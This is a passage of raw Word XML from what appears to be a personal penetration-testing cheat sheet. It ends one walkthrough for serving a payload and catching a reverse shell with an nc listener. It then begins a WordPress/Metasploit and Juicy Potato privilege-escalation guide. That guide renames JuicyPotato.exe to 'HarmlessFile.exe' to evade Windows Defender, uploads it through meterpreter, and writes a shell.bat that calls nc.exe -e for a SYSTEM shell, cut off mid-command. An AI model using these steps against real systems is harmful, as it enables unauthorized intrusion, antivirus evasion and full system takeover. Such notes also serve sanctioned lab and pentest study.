              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="326152D4" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5AB354D9" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CCAEDC3" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t xml:space="preserve">This should result in the .exe file being newly created in your current directory, use </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">ls </w:t>
            </w:r>
            <w:r>
              <w:t>to check.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="6DB8ACD3" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0582B9BE" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="031C66F9" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73A72162" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>Create a http server on your machine. Python can be used easily to do so here:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> python3</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-m</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>http.server</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="594C4F03" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60CAFB88" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66208B5D" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="008841C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>More on netcat can be found below</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="098F4B66" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t xml:space="preserve">Start a listening server on the same port as the </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LPORT</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>you set in step .f</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">You can use </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA69A6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nc </w:t>
            </w:r>
            <w:r>
              <w:t>for this.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C209EE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> nc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C209EE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-lvnp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C209EE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PORT NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="63DF5CAB" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F800074" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4C9E3E3A" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6DC619F9" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="5524A898" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0AF2E5AA" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2361608F" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69C21175" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="699B00A2" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A64A90E" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02B67620" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CDE5CCD" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRPr="00D806EE" w:rsidRDefault="00EA7204" w:rsidP="00EA7204"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60DF122D" w14:textId="5A5DF48B" w:rsidR="003804BA" w:rsidRDefault="003804BA"/>
    <w:p w14:paraId="26590089" w14:textId="0DC5AE08" w:rsidR="00ED083E" w:rsidRDefault="00ED083E"/>
    <w:p w14:paraId="2725CE39" w14:textId="77777777" w:rsidR="00ED083E" w:rsidRDefault="00ED083E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72033263" w14:textId="53308F6E" w:rsidR="00ED083E" w:rsidRDefault="00ED083E" w:rsidP="00ED083E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">WordPress Exploitation With MSF wp_admin_shell_upload </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED083E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Juicy Potato</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="margin" w:tblpY="654"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="499"/>
        <w:gridCol w:w="2415"/>
        <w:gridCol w:w="8113"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED083E" w14:paraId="76B99296" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F69C7C7" w14:textId="77777777" w:rsidR="00ED083E" w:rsidRDefault="00ED083E" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0821F3EA" w14:textId="421E0AB7" w:rsidR="00ED083E" w:rsidRDefault="00ED083E" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36CC180C" w14:textId="7A203749" w:rsidR="00ED083E" w:rsidRPr="00322D20" w:rsidRDefault="00ED083E" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF WE HAVE A METERPRETER SHELL IN A MACHINE VIA WORDPRESS, AND WE ARE ABLE TO GAIN ENTRY VIA A NETCAT REVERSE SHELL, THIS EXPLOIT WILL WORK ON</w:t>
            </w:r>
            <w:r w:rsidR="00C246E5" w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> WINDOWS SERVER 2016 OS MACHINES.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34896429" w14:textId="33FF7574" w:rsidR="00C246E5" w:rsidRDefault="00C246E5" w:rsidP="00AC6DA5">
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Check if the OS is server 2016 using the command </w:t>
            </w:r>
            <w:r w:rsidRPr="00C246E5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sysinfo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C246E5">
              <w:t>while in meterpreter.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="431E268C" w14:textId="78C118DE" w:rsidR="00C246E5" w:rsidRDefault="00C246E5" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>Be sure to download JuicyPotato.exe from the web.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidRPr="006740A4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://github.com/ohpe/juicy-potato/releases</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED083E" w14:paraId="1369B165" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48397A81" w14:textId="77777777" w:rsidR="00ED083E" w:rsidRDefault="00ED083E" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="601D83FF" w14:textId="0899AF65" w:rsidR="00ED083E" w:rsidRDefault="00092262" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="675DC55F" w14:textId="0337F013" w:rsidR="00ED083E" w:rsidRPr="00EC64F5" w:rsidRDefault="00C246E5" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>Once JuicyPotato.exe has been installed, make sure you know the directory it is placed in. Make a copy of it and give it a different name to avoid Windows Defender blocking it.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C246E5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidRPr="00C246E5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> ~/WHEREEVER_THE_FILE_IS</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C246E5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>mv</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C246E5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>JuciyPotato.exe HarmlessFile.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE2FFE" w14:paraId="6BCAC087" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="58C72809" w14:textId="77777777" w:rsidR="00CE2FFE" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B57D1E2" w14:textId="2D9383FA" w:rsidR="00CE2FFE" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C5BE0C4" w14:textId="05DE171B" w:rsidR="00CE2FFE" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>Now, we can upload it to a directory which has write permissions (see above for an idea, but generally a folder called ‘</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>uploads’</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> will usually work).</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00092262">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>background</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(If in session, meterpreter connection.)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00092262">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C246E5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/WHEREEVER_THE_FILE_IS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00092262">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">sessions </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00092262">
              <w:t>Change the # to whichever number msfconsole assigned it.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(If not already connected remotely with the meterpreter)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00092262">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>upload</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00092262">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>HarmlessFile.exe</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Or whatever you called the file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE2FFE" w14:paraId="55A8F851" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C48E8A9" w14:textId="77777777" w:rsidR="00CE2FFE" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="741291B4" w14:textId="3D453E00" w:rsidR="00CE2FFE" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="49BC3E25" w14:textId="1EF8C4AC" w:rsidR="00CE2FFE" w:rsidRPr="00370C7B" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00092262">
              <w:t>e can create a batch file that will be executed by the exploit, and return a SYSTEM shell. Let's</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00092262">
              <w:t>add the following contents to</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> a file, call it</w:t>
            </w:r>
            <w:r w:rsidRPr="00092262">
              <w:t xml:space="preserve"> shell.bat:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">echo START </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>C:\WHATEVER\THE\REALPATH\ADDRESS\IS\nc.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> -e</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="FF0000"/>
